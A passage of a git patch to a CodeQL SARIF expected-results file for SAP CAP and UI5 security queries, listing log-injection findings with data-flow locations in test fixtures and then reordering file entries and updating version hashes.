"javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 54 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 25, + "startColumn" : 25, + "endColumn" : 29 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 25, + "startColumn" : 16, + "endColumn" : 29 + } + }, + "message" : { + "text" : "\"CAP:\" + book" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { 
+ "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7c291d40b7c61d4f:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + 
} + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : 
"js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7c291d40b7c61d4f:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 47 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 36 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 21, + "endColumn" : 34 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 47 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 9, + "startColumn" : 38, + "endColumn" : 51 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 9, + "startColumn" : 36, + "endColumn" : 53 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1).\nLog entry depends on a [user-provided value](2)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7c291d40b7c61d4f:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 47 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 36 + } + }, + "message" : { + "text" : "{ messageToPass }" + } 
+ } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 21, + "endColumn" : 34 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 47 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 9, + "startColumn" : 38, + "endColumn" : 51 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 9, + "startColumn" : 36, + "endColumn" : 53 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : 
"%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 
17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "user-provided value" + } + }, { + "id" : 2, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + } ], + "newlineSequences" : [ "\r\n", "\n", "
", "
" ], + "columnKind" : "utf16CodeUnits", + "properties" : { + "codeqlConfigSummary" : { + "disableDefaultQueries" : false, + "queries" : [ { + "type" : "builtinSuite", + "uses" : "security-extended" + }, { + "type" : "localQuery", + "uses" : "./javascript/frameworks/ui5/src/codeql-suites/javascript-security-extended.qls" + }, { + "type" : "localQuery", + "uses" : "./javascript/frameworks/cap/src/codeql-suites/javascript-security-extended.qls" + } ] + }, + "metricResults" : [ { + "rule" : { + "id" : "js/summary/lines-of-code", + "index" : 101, + "toolComponent" : { + "index" : 3 + } + }, + "ruleId" : "js/summary/lines-of-code", + "value" : 2973 + }, { + "rule" : { + "id" : "js/summary/lines-of-user-code", + "index" : 102, + "toolComponent" : { + "index" : 3 + } + }, + "ruleId" : "js/summary/lines-of-user-code", + "value" : 2973, + "baseline" : 0 + } ], + "semmle.formatSpecifier" : "sarif-latest" } + } ] } From cef7d21c0c9a3ba75b3651f5697bdd4fadba6387 Mon Sep 17 00:00:00 2001 From: Mauro Baluda Date: Wed, 22 May 2024 17:40:29 +0200 Subject: [PATCH 10/15] Update sarif file --- .github/workflows/javascript.sarif.expected | 27772 +----------------- 1 file changed, 793 insertions(+), 26979 deletions(-) diff --git a/.github/workflows/javascript.sarif.expected b/.github/workflows/javascript.sarif.expected index 0c1fa0705..f462b80fc 100644 --- a/.github/workflows/javascript.sarif.expected +++ b/.github/workflows/javascript.sarif.expected @@ -44,7 +44,7 @@ }, "extensions" : [ { "name" : "advanced-security/javascript-sap-cap-queries", - "semanticVersion" : "0.2.0+ffea18ba020c5590287d2f25b90825ce0c7cf055", + "semanticVersion" : "0.2.0+ebe0a6bdde3b48cd48fb332dd689a81c5906dbfe", "rules" : [ { "id" : "js/cap-sql-injection", "name" : "js/cap-sql-injection", 
@@ -127,7 +127,7 @@ } ] }, { "name" : "advanced-security/javascript-sap-ui5-queries", - "semanticVersion" : "0.6.0+ffea18ba020c5590287d2f25b90825ce0c7cf055", + "semanticVersion" : "0.6.0+ebe0a6bdde3b48cd48fb332dd689a81c5906dbfe", "rules" : [ { "id" : "js/ui5-xss", "name" : "js/ui5-xss", @@ -3152,7 +3152,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/codeql-config.yaml", + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 7 } @@ -3178,7 +3178,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uri" : ".github/codeql/codeql-config.yaml", "uriBaseId" : "%SRCROOT%", "index" : 8 } @@ -3256,7 +3256,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", "uriBaseId" : "%SRCROOT%", "index" : 11 } @@ -3282,7 +3282,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 12 } @@ -3490,7 +3490,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", "uriBaseId" : "%SRCROOT%", "index" : 20 } @@ -3516,7 +3516,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uri" : "javascript/frameworks/cap/lib/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 21 } 
@@ -3542,7 +3542,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uri" : "javascript/frameworks/cap/src/qlpack.yml", "uriBaseId" : "%SRCROOT%", "index" : 22 } @@ -3724,7 +3724,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 29 } @@ -3750,7 +3750,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 30 } @@ -3880,7 +3880,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 35 } @@ -3906,7 +3906,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 36 } 
@@ -3984,7 +3984,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 39 } @@ -4010,7 +4010,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", "uriBaseId" : "%SRCROOT%", "index" : 40 } @@ -4088,7 +4088,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", "uriBaseId" : "%SRCROOT%", "index" : 43 } @@ -4114,7 +4114,7 @@ "locations" : [ { "physicalLocation" : { "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", "uriBaseId" : "%SRCROOT%", "index" : 44 } 
